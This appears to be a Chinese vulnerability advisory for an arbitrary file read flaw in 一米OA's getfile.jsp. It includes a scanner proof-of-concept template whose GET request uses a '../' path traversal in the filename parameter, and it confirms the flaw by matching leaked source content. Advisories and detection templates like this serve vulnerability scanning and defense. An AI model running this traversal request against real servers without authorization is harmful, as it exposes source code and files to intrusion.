yimi-oa-getfile-file-read: 一米OA getfile.jsp 任意文件读取漏洞

日期: 2025-09-01 | 影响软件: 一米OA | POC: 已公开

漏洞描述

一米OA getfile.jsp文件过滤不足,导致任意文件读取漏洞 app="一米OA"

PoC代码[已公开]

id: yimi-oa-getfile-file-read

info:
  name: 一米OA getfile.jsp 任意文件读取漏洞
  author: zan8in
  severity: high
  description: |
    一米OA getfile.jsp文件过滤不足,导致任意文件读取漏洞
    app="一米OA"
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E4%B8%80%E7%B1%B3OA/%E4%B8%80%E7%B1%B3OA%20getfile.jsp%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
  
rules:
  r0:
    request:
      method: GET
      path: /public/getfile.jsp?user=1&prop=activex&filename=../public/getfile&extname=jsp 
    expression: response.status == 200 && response.body.bcontains(b'"com.redmoon.oa.pvg.Privilege"')
expression: r0()

相关漏洞推荐